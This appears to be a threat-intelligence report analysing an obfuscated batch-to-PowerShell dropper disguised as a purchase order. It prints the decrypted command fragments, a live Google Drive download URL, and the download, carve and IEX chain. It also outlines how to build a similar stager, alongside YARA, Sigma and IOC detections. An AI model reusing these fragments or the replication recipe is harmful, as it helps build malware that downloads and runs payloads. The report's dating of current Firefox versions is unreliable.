93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0unclassified-danish-batch-ps-dropper: 93aec3da — Base64+XOR Monokrome fragments, Google Drive C2
Executive Summary: Second observed sibling in the Danish-variable batch→PowerShell dropper family. Shares the stride-4 character-skip cipher (stolthe168) and IEX reflective execution chain with sibling 402879ff, but adds two significant upgrades: (1) nineteen Base64+XOR-encrypted PowerShell command fragments delivered via a nested Monokrome function, and (2) a Google Drive direct-download URL as the stage-2 source. Hardcoded payload carve offsets are 138643 / 15571 bytes. Fabricated Firefox 150.0 User-Agent. Static-only analysis; CAPE skipped because the file is a single-line batch script.
What It Is
| Field | Value |
|---|---|
| SHA-256 | 93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0 |
| Filename | PO# ATVHCWS26-387 HANSUNG VINA..bat |
| Size | 4,134 bytes |
| File type | ASCII text, single line, no line terminators ^[file.txt] |
| Family | unclassified-danish-batch-ps-dropper — second confirmed sibling |
| Build | DOS batch wrapper → inline PowerShell; no compiler, no packer |
The outer layer is a .bat file that invokes powershell.exe -NoProfile -windowstyle 1 with a 4,091-character inline script. ^[strings.txt:1] The -windowstyle 1 argument is an alias for -windowstyle Normal, but in this context it simply prevents the hidden-window flag from appearing in command-line telemetry.
How It Works
1. Character-skip cipher (stolthe168)
The script defines stolthe168($sekl), a stride-4 decoder with offset 3 (same arithmetic as sibling 402879ff): real characters sit at indices 3, 7, 11, ... inside noise-padded string literals. ^[strings.txt:1] Unlike the first sibling, the decoded fragments here do not form plaintext commands directly. Instead they assemble the body of a secondary decoder function named Monokrome:
$script:balance=[Convert]::FromBase64String($sekl)
$script:voltaseis252=[Text.Encoding]::ASCII.GetString($balance)
(Decoded from concatenated stolthe168 outputs; see reconstruction below.)
2. Base64+XOR fragment decryption (Monokrome)
Monokrome($sekl,$untessella=0) takes a Base64 string, decodes it, XORs every byte with the key $scopu22 = @(66,97,110,97) (ASCII Bana), and optionally IEXs the result if $untessella is truthy.
Nineteen Monokrome calls are embedded in the script body. Eleven carry the 1 parameter (decrypt + execute); eight decrypt only (store in variables). Decrypted fragments include:
| # | Decrypted value | Executed? |
|---|---|---|
| 0 | 5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0 |
No — stored in $geolog (User-Agent) |
| 1 | https://drive.google.com/uc?export=download&id=14Led1yEUXipMpwH6VgGsTwaS0lN2tUNv |
No — stored in $samfundsn (URL) |
| 2 | > |
No — dead code (likely a fragment remnant) |
| 3 | $global:calci=$env:appdata+$mbelfadmixesor |
Yes |
| 4 | $global:fald=$samfundsn.split($senntalndledn) |
Yes |
| 5 | [Net.ServicePointManager]::SecurityProtocol=3072 |
Yes |
| 6 | $global:uvejrssk=New-Object Net.WebClient |
Yes |
| 7 | $uvejrssk.Headers[[Net.HttpRequestHeader]40]=$geolog |
Yes |
| 8 | DownloadFile |
No — stored in $sendeb (method name) |
| 9 | $uvejrssk.$sendeb.Invoke($samfundsn,$passalu) |
No — stored in $dkse (download invocation) |
| 10 | $global:levned=(Test-Path $passalu) |
Yes |
| 11 | $global:sickeespre=$true |
Yes |
| 12 | Sleep(4) |
Yes |
| 13 | $global:levned=(Test-Path $passalu) |
Yes |
| 14 | $global:dripp=$global:cocka++%$fald.count |
Yes |
| 15 | $global:biologi=gc $passalu |
Yes |
| 16 | $global:Scenopi=[Convert]::FromBase64String($biologi) |
Yes |
| 17 | $global:arbe=[Text.Encoding]::ASCII.GetString($Scenopi) |
Yes |
| 18 | $global:tappehall=$arbe.substring($mizp,$fiskeb) |
Yes |
Execution chain: Monokrome decrypts the fragment, builds the PowerShell code via Mutismss (&$afsnitsn $sammen where $afsnitsn decodes to IEX), and either stores or executes it. ^[strings.txt:1]
3. Downloader behavior
After the fragments execute, the runtime state is:
$samfundsn= Google Drive direct-download URL$geolog= fabricated Firefox 150.0 UA$passalu=%appdata%\Beregn166.Ove(staging path)$mizp= 138643,$fiskeb= 15571 (hardcoded carve offsets)
The script then:
- Sets TLS 1.2 (
SecurityProtocol=3072) - Spins up a
Net.WebClientwith the fake UA - Calls
.DownloadFile($samfundsn, $passalu) - Waits 4 seconds and checks file existence
- Reads the downloaded file, Base64-decodes it, converts to ASCII
- Extracts substring(138643, 15571) — the inner payload
IEXs the carved payload
4. Obfuscation quality
- Noise-padded literals: The
stolthe168arguments are 59–149 character strings of Danish/Scandinavian word salad (Skaldship Pengestrmsanalysen Koldblodigt klapperslanger,uglies villigeres Cushie pondgrass). ^[strings.txt:1] - Variable names: Danish/Nordic (
blegnesun,kokette57,senntalndledn,voltaseis252). Same linguistic fingerprint as sibling402879ff. - Dead code:
mp 'afghan' 'trim' 'diago'at script start; unused variable assignments insidestolthe168. - No VM/debug checks: Relies on being a text file that sandboxes may skip. ^[dynamic-analysis.md]
C2 Infrastructure
| Indicator | Value |
|---|---|
| Stage-2 URL | https://drive.google.com/uc?export=download&id=14Led1yEUXipMpwH6VgGsTwaS0lN2tUNv ^[strings.txt:1] |
| User-Agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0 ^[strings.txt:1] |
| Staging path | %appdata%\Beregn166.Ove |
| Payload carve | offset 138643, length 15571 bytes |
| Reflective execution | IEX via $afsnitsn decoder |
Google Drive is used as a free, reputation-whitelisted staging host. The uc?export=download endpoint bypasses the preview page and returns the raw file directly.
Interesting Tidbits
- Firefox 150.0: The User-Agent claims Firefox 150.0, a version that does not exist (current ESR is ~115, release ~128). This is a fabricated string reused from sibling
402879ff(which claimed 143.0). ^[strings.txt:1] - XOR key "Bana": The Monokrome decryption key is the four-byte ASCII string
Bana— short, English, and identical across all nineteen fragments. This is a significant opsec regression vs. per-fragment keys. - Larger carve than sibling:
402879ffcarved at offset 428386 / length 22190. This sample uses offset 138643 / length 15571 — a smaller payload, suggesting a different stage-2 file. - No service termination: Sibling
402879ffstopped a prior service (spsv ichoglanop) before staging. This sample omits that step. - Purchase-order lure: Filename
PO# ATVHCWS26-387 HANSUNG VINA..batmasquerades as a purchase-order document, exploiting the "Hide extensions" default. ^[metadata.json]
How To Mess With It (Homelab Replication)
Goal: Build a comparable batch→PowerShell stager with Base64+XOR encrypted fragments.
- Write a PowerShell payload downloader.
- Split it into command fragments.
- Encrypt each fragment with Base64(XOR(plaintext, key=b'Bana')).
- Embed a
Monokrome-style decoder that reconstructs and IEX's each fragment. - Wrap in a batch file:
powershell.exe -NoProfile -windowstyle 1 "<script>". - Execute and verify network traffic shows the fake UA and Google Drive fetch.
Deployable Signatures
YARA rule
rule DanishBatchPSDropper_Monokrome {
meta:
description = "Danish-variable batch→PowerShell dropper with stolthe168/Monokrome Base64+XOR fragments"
author = "PacketPursuit"
date = "2026-07-27"
hash = "93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0"
strings:
$stolthe168 = "function stolthe168" ascii wide
$monokrome = "function Monokrome" ascii wide
$mutismss = "function Mutismss" ascii wide
$afsnitsn = "$afsnitsn" ascii wide
$bana_key = {24 73 63 6f 70 75 32 32 3d 40 28 36 36 2c 39 37 2c 31 31 30 2c 39 37 29} // $scopu22=@(66,97,110,97)
$partitu114 = "function partitu114" ascii wide
condition:
filesize < 10KB and
3 of ($stolthe168, $monokrome, $mutismss, $afsnitsn, $partitu114) and
any of ($bana_key)
}
Behavioral hunt query (Sigma-like)
title: Danish Batch PowerShell Dropper Execution
detection:
selection:
CommandLine|contains:
- 'powershell.exe -NoProfile -windowstyle 1'
- 'function stolthe168'
- 'function Monokrome'
- '$scopu22=@(66,97,110,97)'
condition: selection
IOC list
| Type | Value |
|---|---|
| SHA-256 | 93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0 |
| Filename | PO# ATVHCWS26-387 HANSUNG VINA..bat |
| Google Drive ID | 14Led1yEUXipMpwH6VgGsTwaS0lN2tUNv |
| Staging file | %appdata%\Beregn166.Ove |
| XOR key | Bana (0x42,0x61,0x6e,0x61) |
| Fake UA | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0 |
Detection Signatures
| capa / ATT&CK | Mapping | Evidence |
|---|---|---|
| T1059.003 | Windows Command Shell | Batch script outer layer ^[file.txt] |
| T1059.001 | PowerShell | Inline PowerShell with IEX ^[strings.txt:1] |
| T1105 | Ingress Tool Transfer | Net.WebClient.DownloadFile to Google Drive ^[strings.txt:1] |
| T1620 | Reflective Code Loading | IEX execution of carved substring ^[strings.txt:1] |
| T1027 | Obfuscated Files or Information | stolthe168 stride-4 cipher + Base64+XOR fragments ^[strings.txt:1] |
References
- unclassified-danish-batch-ps-dropper — Family entity page (first sibling
402879ff) ^[entities/unclassified-danish-batch-ps-dropper.md] - character-skip-cipher-powershell-obfuscation — Technique page for the stride-4 decoder ^[techniques/character-skip-cipher-powershell-obfuscation.md]
- Sibling analysis:
/intel/analyses/402879ff4b368a1dc489d8572137305c84b1983d9539d374f45f815bfa7c1177.html
Provenance
Analysis derived from static artefacts in raw/analyses/93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0/. File typed as ASCII text with very long lines (4134 chars, no line terminators) ^[file.txt]. Strings extracted via strings ^[strings.txt]. FLOSS and capa both failed because the input is not a supported binary class ^[floss.txt] ^[capa.txt]. CAPE skipped detonation for the same reason ^[dynamic-analysis.md]. Decryption performed manually via Python scripts replicating the stolthe168 stride-4 decoder and the Monokrome Base64→XOR pipeline.